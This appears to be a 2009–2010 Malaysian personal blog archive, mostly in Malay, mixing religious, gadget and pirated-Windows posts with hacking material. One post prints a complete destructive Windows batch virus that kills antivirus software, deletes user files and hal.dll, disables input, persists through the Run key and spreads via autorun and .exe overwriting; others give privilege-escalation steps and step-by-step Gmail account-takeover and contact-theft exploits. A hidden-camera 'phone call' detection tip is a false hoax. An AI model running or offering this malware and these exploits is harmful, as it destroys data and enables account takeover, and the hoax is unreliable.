"A System Is Secure When You Can Rely On It And Behave It As You Expect"

Percaya atau x, kita boleh ber”tunang” tanpa sedar??

2010-11-15T18:56:00.000-08:00

Percaya atau x, kita boleh ber”tunang” tanpa sedar?? Yup, kita boleh bertunang tanpa kita sedar, bila seorang lelaki, berhasrat untuk mengambil seorang perempuan untuk dijadikan isteri. Eh, itu memang normal bukan? Tapi, yang anda mungkin x tahu, anda sebenarnya sudah bertunang bila situasi seperti berikut berlaku:

Lelaki menyatakan hasrat ingin menjadikan perempuan itu isterinya, dan perempuan itu bersetuju. Adakah dikira telah bertunang? Padahal tidak ada ibu bapa perempuan tersebut.

Pinang dari segi hukum fiqah, bererti pihak lelaki menyatakan hasrat berkahwin pada pihak perempuan. Itu dipanggil pinang. Bila perempuan menjawab setuju, maka jadilah perempuan itu tunang laki tersebut.

Situasi yang dianggap pinangan:

"Aku nak jadikan kamu sebagai isteriku"

"Kahwinlah dengan kita bila2"

Bila si perempuan bersetuju, dia akan jadi tunang. Sama ada bercakap dalam telefon, tetap dah jadi tunang.

Contoh:

"lelaki sebut dalam telefon, "I nak jadikan u isteri I lah"

Perempuan tersebut jawab, I sukalah, I setujulah, oraitt I’m fine, oklah, I redha atau apa2 yang menunjukkan dia suka dengan “pinangan” lelaki tersebut, maka ia sudah dianggap bertunang.

Jadi, bila dia dah jadi tunang orang tanpa sedar, bila ada lelaki yang meminang, hukumnya haram.

Kita orang melayu time nak tunang duk bawang rombongan 1 bas, bawak barang2 pinangan, itu sebenarnya adalah ADAT bukan dari segi hukum Islam. Dari segi hukum Islam, dah jatuh hukum tunang.

Persoalan ialah bila Ibu bapa xde. Mengikut hukum syarak, kalau perempuan itu sudah diizin pada syarak. Sebagai contoh, perempuan yang cerdik, yang baligh, yang blh berfikir, etc dia sudah dianggap bertunang.

Bila perempuan tu x menepati hukum syarak tersebut, contoh seperti x baligh lagi(baru darjah 3 mungkin), perempuan tu bodoh(x boleh berfikir), gila, dan sebagainya, makanya wali diperlukan untuk jawab “pinangan” tersebut.

Haaa, adakah anda ternganga bila tiba2 tau anda sudah menjadi tunangan orang tanpa sedar?? Haaa, ayokkk, x tau. Hehehe.

Want To Be A Spy.....???

2010-01-10T07:39:00.000-08:00

LIHAT PRODUK TERBARU

PEN PINTAR (4 IN 1)

(RECORD VIDEO WITH AUDIO + SNAP PHOTO + BALL PEN + USB DRIVE)

KEGUNAAN:

Record video masa anda meeting, taklimat biz, kuliah, ceramah agama, ceramah politik dll. Tak payah tulis-tulis atau ambik note.
Ambil video secara spontan sebab pen pintar ni kecik, so anda boleh bawa ke mana-mana. Boleh rakam mcm-mcm aksi spontan tuu!
Boleh dijadikan PENDRIVE, boleh simpan data sebesar 4GB/8GB.
Boleh snap gambar !!!
Boleh buat menulis..Tulis apa-apa je laa..
Data boleh ditransfer dari PC viseversa, pastu boleh tengok video yang anda rakam kat PC/LAPTOP.

CIRI-CIRI:

Kecik dan mudah dibawa
Rakaman video dengan gambar
Bercolour dalam bentuk AVI
Built in lithium battery
Internal Memori 4GB/8GB

KAMERA:

Format video AVI 640x480
Format Photo: JPG 1280(W) x 1024(H) Pixels
Saiz video +-500KB seminit
Merekod sampai memori penuh selagi x OFF
Lithium Battery
Battery +-2jam

KANDUNGAN PAKEJ:

1x Pen Pintar 4GB/8GB

1x Travel Wall Charger

1x USB Cable

1x Case

Windows 8 xTreme 32 Bit Activated Forever

2009-12-14T02:19:00.000-08:00

Windows 8 xTreme 32 Bit Activated Forever

What is Windows 8 xTreme

Windows 8 xTreme its a System based on Windows 7 F! Nal:

- Windows 8 xTreme doesn't have any components removed from Original Windows 7 Image so you wont lose any compatibly with software, hardware or miss any stuff at all.

- Windows 8 xTreme its a Clean Windows 7 Image with a compilation of the best tweaks and a new integrated look ... keeping all new features like superbar, etc ...

- Windows 8 xTreme has been tested in a real machine with a compilation of over 200 softwares ...

- All default applications are silently installed before StartUp ...

Tweaks:

* UAC Disabled

* Take Ownership

* Show File Extensions

* Automatic Defragmentation with Diskeeper

* New Cmd File to Right Click

* Enabled Search System Folders in Search

* ClearType

* Windows Will Tell You Exactly What it is Doing When it is Shutting Down or is Booting

* Increase Network Throughput

* ... many tweaks for IE8

* ... many more tweaks for W7 ...

Design:

* New Windows 7 Themes

* New Start Button

* New Cursor 3D

* New Hd Wallpapers

* New Hd System Icons Integrated In System

* New User Account Pics

* New Windows Scheme Sounds

* New Logon Screen

* ... and more

Extra Toos Integrated In System:

* SPTD

Extras:

* Cursor Fx Cursor 3D (separate optional)

MD5: DDCD1F82FBA14134537F63E00C9E51BC

[Screen shots]

Windows XP-Turbo 3D SP3 2010

2009-12-14T02:16:00.000-08:00

Windows XP-Turbo 3D SP3 2010 .. Stable, Fast, Safe, Strong, Charming 3D appearance in the icons, wallpapers, themes ,the movement of windows and every thing ..

Windows XP-Turbo 3D SP3 2010 comes with a powerful collection of the most important full programs (optional install).

It integrated with the latest updates and hotfixes .

All this and more .. Sure you will feel the difference ..

Release Name: Windows XP-Turbo?„? 3D SP3 2010

System: Windows XP Professional SP3 Original MSDN

Year: 2009

CD Key: Already Slipstreamed Original Key

Activation: Already activated

Install method: Unattended

File format: ISO

Size: 700 MB

Bootable

FULLY UPDATEABLE

Accept updates from Microsoft

Programs Added: (optional install)

Avira Antivirus

yahoo messenger 10

Multiyahoo messenger regit

flash player

windows media player 11

K-lite Kodec

icon resize

Icon Pakager

Icons

Hitman pro 3.5

Mozilla Firefox 3.5

Transbar

True transperncy

Ubericon

Vista Rainbar

visual Tooltip

Yzshadow

Refrech icon cache

Crystal Rocket dock

Dock Vieena

Microsoft Geniune Advantage

Netframework 2

winrar 3.8

Advanced task Manager

Clean Unistaller 3

Error Repair proffesional V3

More than 15 New 3D styler Themes

3D Icons

3D wallpapers

Size of version 700 MB

each part 200 MB except the last 50 MB

Detect Hidden Web Cam

2009-09-22T22:53:00.000-07:00

Cara mengesan HIDDEN CAMERA menggunakan Handphone
Mulanya aku dpt email dr Vodafone, pas tu aku try.

Hanya dgn handphone!!!! aku dah try, aku cuba pasang camera kt rumah aku pas tu aku cuba cara ni - mmg berkesan-

Sebelum masuk atau nak check tu, try buat call dulu - pastikan boleh buat call dulu -

pas masuk kt tpt tu, cuba buat call semula, kalau tak boleh - sah ada HIDDEN CAMERA - kerana ada gangguan fibre optic dr camera tu.

ni original email aku dpt

Check with your handphone, make sure that your handphone can still make a
call before you enter a restroom.

And after entering into that particular toilet, if your phone cannot make a
call out (this is due to the interference of fibre optic
during implementation), it means that there is a HIDDEN CAMERA inside, so be
very cautious ladies!!
PLS ALSO PASS THIS MAIL TO YOUR MOTHER, SISTER ,GIRL FRIENDS FOR ALL MALE

..::Certified Ethical Hacker::..

2009-05-24T21:30:00.001-07:00

Module I : Introduction to Ethical Hacking
Module II: Footprinting
Module III: Scanning
Module IV: Enumeration
Module V: System Hacking
Module VI: Trojans and Backdoors
Module VII: Sniffers
Module VIII: Denial of Service
Module IX: Social Engineering
Module X: Session Hijacking
Module XI: Hacking Web Servers
Module XII: Web Application Vulnerabilities
Module XIII: Web Based Password Cracking
Module XIV: SQL Injection
Module XV: Hacking Wireless Networks
Module XVI: Viruses
Module XVII: Novell Hacking
Module XVIII: Linux Hacking
Module XIX: Evading IDS, Firewalls and Honey pots
Module XX: Buffer Overflows
Module XXI: Cryptography

Virus Fake i Think

2009-05-04T23:41:00.000-07:00

@ echo off
rem ---------------------------------
rem Kill Anti-Virus
net stop r0;Security Centerr1;
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------
rem ---------------------------------
rem Change User Password To Plaque
net user %username% Plaque
rem ---------------------------------
rem ---------------------------------
rem Delete My Documents
del /f /q '%userprofile%\My Documents\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete My Pictures
del /f /q '%userprofile%\My Pictures\*.*'
rem ---------------------------------
rem ---------------------------------
rem Spam Local Disk
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
rem ---------------------------------
rem ---------------------------------
rem Spam With VBScript Msgboxes
echo Do>>msgbox.vbs
echo x=msgbox("Plaque attack!",0+48,"Infected") >>msgbox.vbs
echo Loop>>msgbox.vbs
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
rem ---------------------------------
rem ---------------------------------
rem Change Computer Time
time 12:00
rem ---------------------------------
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------
rem ---------------------------------
rem Infect Reg Run Key
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------
rem ---------------------------------
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ---------------------------------
rem ---------------------------------
rem Infect All Folders
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
rem ---------------------------------
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------
rem ---------------------------------
rem Infect Autoexec.bat
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
rem ---------------------------------
rem ---------------------------------
rem Delete All Documents
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All Texts
DIR /S/B %SystemDrive%\*.txt >> FIleList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All Pdf
DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_pdf.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All Xml
DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
shutdown /s /t 00
rem ---------------------------------
rem ---------------------------------
rem Infect All Exe
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy %0 "%%j:%%k"
rem ---------------------------------

Getting Administrator Privilages

2009-05-04T23:35:00.000-07:00

cara 1

- buka notepad
-taip "net localgroup Administrator namaAnda/ add" ( tanpa tanda " " )
-buat login masuk admin p pc
-buat dia run file tadik
-yeaaaa anda dah jadik admin

( selamat mencuba )

cara ke-2

- ok.. masuk pi safe mood
- ( selalunya la kan... user ni tak pasang password d administrator )
- k dah masuk
- pi control panel
- er... user account lepas tu.. haa.. pandai pandai la..

cara ke-3

1. Run Registry Editor (Regedt32.exe).

2. Perform the following steps on each of the registry keys
identified above:

A. On the Security menu, click Permissions.

B. Click "Replace Permissions on Existing Subkeys" so that it
is

selected.

C. Click Everyone, change the Type Of Access to Read, and then
click OK.

3. Exit Registry Editor.

Gmail Bug

2009-05-04T23:30:00.000-07:00

INTRODUCTION

This bug
has already been corrected, that's why it's been published (October-November
2005)

In this manual
you will see step by step how to exploit Gmail's vulnerability, that gave
you access to any account, reported by Anelkaos, colaborator of elhacker.net's
forum and patched by Google by October 18. Due to the bug's gravity (that
allowed in a few simple steps to login in any Gmail account), it was decided
not to publish this document while the bug was still active. Motives are
more than obvious because ALL Gmail accounts were vulnerable to the bug.

Google hasn't
declared definitively this topic, and they seem to have no intention of
publishing the bug. The veracity of the failure was demonstrated to the
editors of the Magazine "Seguridad0", logging into an account
created for that purpose, just as described in http://www.elistas.net/lista/informativos/archivo/indice/61/msg/79/.
They also "dared" to publish this news in CyruxNET
and PCWorld.

The bug was
discovered in October 14 and it was patched in October 18 because ANELKAOS
decided to conctact GMail instead of publishing the bug in a list of security,
and lamentably we couldn't do more demos in other sites that we sent the
news, and because we're not HBX Networks, all the people claimed for a
"hacking' test". Thanks to heaven, we have saved all the mails
where Google recognize the failure. ;).

Unlike the reported
by HBX and published by BetaNews last year, this bug doesn't require cookie
robbery, and because of that, the bug's danger was considerably higher.

PROCEDURE

This is the way Sirdarckcat
(EHN's user) developed the exploit, although the original method is easier,
the concept is the same one.

Due to the fact that
this demonstration was realized against another's person account, all
data that could bring legal consequences have been hiden. In AUTH variable
goes the ciphered address of the mail's propetary, and although we don't
know how to decipher it, we've preferred to hide its values, in case "someone
else" could :).

First of all, we need
two sessions. For that we've chosen to use Internet Explorer and Mozilla.
We start the session normally... for example, in Mozilla..

If we pay attention,
we notice that the login screen is now different. It doesn't just ask
if you've forgotten your password, it also asks now for the user. Too much
casualty, isn't it? That soon and coinciding with the publishing of the
bug's existence it has changed the authentication is too much coincidence,
isn't it? We're talking about 10 days ago :).

Well, let's continue.
Now we need some data we'll modify. For that we will also iniciate an
Internet Explorer session, but we stop the browser as soon as it says
"Loading...".

We simply look at
the source code and we save the value of the "ver" variable,
that we will need later.

Then we allow
the page to continue loading, and we look the direction of the inbox,
that we can see by pressing right clicking, and then Properties.

We will need
the "zx" variable, and we save it.

Now we go to 'mail/?username=victim&zx=[zx
Variable]'

And
we stop the charging of the page just when it stops Loading, getting inside:

We stop again
the browser, and we look at the source code.

Here
we have the code of AUTH that we need to initiate session as our victim,
but our cookie disagree (not the same).

We take a look inside the cookie, and we change the value of "ID" for the
one we got in the "ver" variable we got before, this what surprising
does is to return a valid value! It doesn't have related information,
why does that happen? Who knows...

GMail confirms that
it's well ciphered, and completes correctly all the rules. Nevertheless,
even the content is not related, it doesn't return an error.

Once modified
the cookie, in the Explorer session, we enter into the following page:

http://mail.google.com/mail?gxlu=victim&zx=[zx
Variable]

In this moment
we haven't already started the session, we've just associated with the
victim's account.

So we go
to: href="http://www.google.com/accounts/ServiceLoginAuth">www.google.com/accounts/ServiceLoginAuth.

And
it sends you to:

mail.google.com/mail/?auth=
[CODIGO auth]

At this point
all we have to do is to modify the values of the cookie that will expire...
At least we give it 1 minute of life.

We enter
mail.google.com/mail/?&&rm=false&null=Entrar&continue

We stop the
loading because if we don't, Google is going to close our session, so
we write:

javascript:document.cookie+=";expires=Thu,%2001%20Jan%202070%2000:00:00%20GMT";

Once extended
the cookie's life, we enter http://mail.google.com/mail/?auth=[AUTH Code]

And we start the session
as the victim.

Complete access, of
course :).

GOODBYE AND
CLOSE.

OK, it's a Beta version,
and they don't have to report anything. But if they would have recognized
it and published a thank you note, this information wouldn't had been
published. We have 3 ways to get to the same result, the others 2 are
quite easier, and because of that easily we can deduce that it's a multibug,
and a design error. With all these clues, they will not take too much
to discover new methods.

Advanced Web Attack Techniques using GMail

2009-05-04T23:28:00.001-07:00

A few months ago, I discovered a vulnerability in GMail where it became trivial to compromise someone's email contact list. I demonstrated the issue to a friend at Google by emailing his GMail account with simple link. Upon clicking the link and viewing the page, no XSS required, your contacts were displayed on screen (see screenshot). From there the email addresses could be easily stolen. Imagine if a spammer stumbled across this!

The issue was fixed within a few days, but the reason this particular vulnerability was interesting is the exploit techniques are a bit different than normally discussed. Also, I've been seeing the scenario described below increasingly often in websites. Those interested in browser security and AJAX development should take note.

Attack Details
Assumes some knowledge of Cross-Site Request Forgeries, but with a slight variation.

1) Email a GMail account a link and click.
example: http://foo/index.html

2) HTML of http://foo/index.html
The single line of HTML below forces the web browser to automatically send an off-domain HTTP request to GMail. If the victim is logged-in(obviously the case when you email a GMail account), the session cookies will be sent along with the request, and the response contains the contact list. The URL was predictable across all users.

Page URL: http://foo/index.html

<*script src="http://mail.google.com/mail/?_url_scrubbed_">

3) Sample content of http://mail.google.com/mail/?_url_scrubbed

The JavaScript line below contains an unreferenced array constant with your contact list of email addresses.

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

GMail normally sends an XmlHttpRequest (XHR) to get this data on the fly where its then eval'ed in the browser and assigned to a variable. However in our case, the constant is loaded into JavaScript space on (http://foo/index.html) using a script tag, so its never assigned to a variable. This means accessing the data requires something more.

4) Accessing the contact list

When JavaScript parses and interprets the unreferenced array the Array constructor is called. Its possible to overwrite the internal Array constructor with our own to access the contact list. The new Array constructor uses a setters to trigger events, then parses out the data we want, and prints the data to screen.

var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

function Array() {
var obj = this;
var ind = 0;
var getNext;
getNext = function(x) {
obj[ind++] setter = getNext;

if(x) {
var str = x.toString();
if ((str != 'ct') &&amp;amp; (typeof x != 'object') && (str.match(/@/))) {
var row = table.insertRow(-1);
var td = row.insertCell(-1);
td.innerHTML = str;
}
}
};
this[ind++] setter = getNext;
}

function readGMail() {
document.body.appendChild(table);
}

Moral of the Story

* Don't put sensitive data in pure JavaScript files. Wrap HTML tags around the data to protect it from script tags.
* If JavaScript files must contain sensitive information, make the URL unpredictable. And/Or...
* Make sure the file cannot be accessed by anything with an off-domain referer.

Kereta terbang kini realiti

2009-05-04T22:56:00.000-07:00

SAINS & TEKNOLOGI
Sumber : http://www.utusan.com.my/

pic : http://www.utusan.com.my/pix/2009/0207/Utusan_Malaysia/Sains_&_Teknologi/st_01.1.jpg

Transition dilengkapi sayap sepanjang tiga meter yang boleh dilipat dan disimpan kemas ketika dipandu di jalan raya kini dipasarkan oleh Terrafugia.

SELEPAS permulaan era automotif melalui penghasilan kenderaan mekanikal pertama oleh Nicolas-Joseph Cugnot pada 1769, dunia menunggu sehingga lebih seabad untuk melihat impian kenderaan terbang menjadi kenyataan.

Kejayaan adik-beradik Wright menerbangkan pesawat pertama pada 1903 bukan sekadar bukti penguasaan sepenuhnya laluan darat, air dan udara tetapi menyumbang kepada sistem pengangkutan yang lebih kompleks.

Seabad selepas penciptaan kapal terbang, pertembungan automobil dan sains aeroangkasa kemudian berganjak kepada satu lagi tahap dengan penghasilan kenderaan ‘dua alam’ iaitu kereta terbang.

Ini sekaligus merealisasikan impian manusia sejak berdekad-dekad lamanya untuk melihat sebuah kenderaan yang bukan hanya pantas di jalan raya malah mampu terbang ke udara.

Parajet Skycar

Pertengahan bulan lalu, sekumpulan penggiat rekreasi berkumpul di tengah kota London untuk membuktikan kepada dunia bahawa kereta terbang bukan lagi fantasi di dalam filem atau sekadar imej pada lukisan kanak-kanak.

“Parajet Skycar (Skycar) hanya kenderaan yang mirip seperti sebuah kereta go-kart tetapi kipas dan sayap paragliding membolehkan ia terbang pada bila-bila masa,” kata Neil Laughton yang merupakan Ketua Ekspedisi Parajet Skycar (London-Timbuktu), baru-baru ini.

Keupayaan itu, menurut Laughton, akan dibuktikan melalui penerbangan sejauh 5,760 kilometer dari London ke Timbuktu, Mali merentasi Perancis, Portugal, Selat Gibraltar, gurun Sahara dan pergunungan di Morocco.

Katanya, Skycar hasil ciptaan jurutera Giles Cardozo merupakan kereta terbang pertama yang dijana oleh bahan bakar bioteknologi.

Teknologi sayap fleksibel (ParaWing) ciptaan Mike Campbell dari Paramania Powerglider pada kenderaan itu membolehkan ia dilipat dan disimpan dengan mudah di dalam bot.

Inovasi ParaWing pada Skycar juga mengakhiri masalah rekaan sayap yang selama ini menjadi punca kegagalan kebanyakan rekaan kenderaan jenis itu.

Skycar berkeupayaan terbang sehingga ketinggian 5,000 meter dengan kelajuan 176 kilometer sejam dan memerlukan jarak antara 50 hingga 100 meter untuk berlepas.

Skycar dilengkapi payung terjun balistik sebagai sokongan kegagalan fungsi enjin dan sayap ketika pendaratan cemas.

Kenderaan dua tempat duduk itu juga mempunyai sokongan pemanduan lasak melalui pacuan empat roda (4X4).

Transition

Selain Skycar, sebuah lagi kereta terbang yang kini semakin menghampiri kejayaan adalah Transition yang dibangunkan oleh syarikat penerbangan, Terrafugia.

Berbeza dengan prinsip penciptaan Skycar, Transition tidak dicipta sebagai sebuah kereta tetapi lebih kepada pesawat yang dapat berfungsi sebagai kenderaan di darat.

Transition yang dilengkapi sayap sepanjang tiga meter yang boleh dilipat dan disimpan kemas ketika dipandu di jalan raya itu kini dipasarkan oleh Terrafugia.

Kenderaan udara peribadi dua tempat duduk itu berupaya terbang sejauh 800 km dengan setiap isian penuh tangki dan muatan seberat 195 kilogram.

Konsep penerbangan yang digunakan pada kereta terbang Transition hampir menyamai teknologi yang digunakan pada kapal terbang biasa.

Jika di darat kawalan dilakukan oleh stereng, kawalan kenderaan itu ketika di udara dilakukan dengan menarik kabel untuk melaras kedudukan sayap untuk menentukan arah penerbangan.

Namun, kenderaan hibrid yang dijual pada harga RM473,000 seunit itu masih lagi bukan sebuah kenderaan yang praktikal bagi kebanyakan orang.

Mengambil kira teknologi digunakan, harga yang ditawarkanitu sebenarnya memadai tetapi yang pasti manusia terpaksa menunggu ‘sedikit masa lagi’ untuk menggantikan kenderaan mereka dengan kereta terbang.

Nak develop virus remover

2009-05-04T22:51:00.000-07:00

